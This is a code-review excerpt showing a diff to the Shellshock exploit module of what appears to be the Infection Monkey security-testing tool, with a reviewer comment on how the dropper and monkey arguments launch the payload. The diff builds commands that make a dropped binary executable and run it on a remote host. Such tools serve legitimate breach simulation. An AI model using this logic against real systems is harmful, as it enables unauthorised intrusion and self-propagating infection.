monkey/infection_monkey/exploit/shellshock.py

```diff
@@ -127,13 +128,13 @@ def exploit_host(self):
                 continue
 
             # turn the monkey into an executable
-            chmod = '/bin/chmod +x %s' % dropper_target_path_linux
+            chmod = CHMOD_MONKEY % { 'monkey_path': dropper_target_path_linux }
             run_path = exploit + chmod
             self.attack_page(url, header, run_path)
 
             # run the monkey
-            cmdline = "%s %s" % (dropper_target_path_linux, DROPPER_ARG)
-            cmdline += build_monkey_commandline(self.host, get_monkey_depth() - 1, dropper_target_path_linux) + ' & '
+            parameters = build_monkey_commandline(self.host, get_monkey_depth() - 1)
+            cmdline = RUN_MONKEY % {'monkey_path': dropper_target_path_linux, 'monkey_type': MONKEY_ARG, 'parameters': parameters} + ' & '
```

Comment:
Notice that before your changes DROPPER_ARG is passed, not MONKEY_ARG. They tell monkey to do different things. Consider this scenario: you have implemented web RCE vuln that executes monkey trough http request. You send "malicious" request, but you get response only once monkey is finished. To stop monkeys from waiting on each other we use dropper. Once monkey with dropper arg is executed, it moves monkey file, launches it and returns (the monkey starts running on another process). Try to build correct monkey command.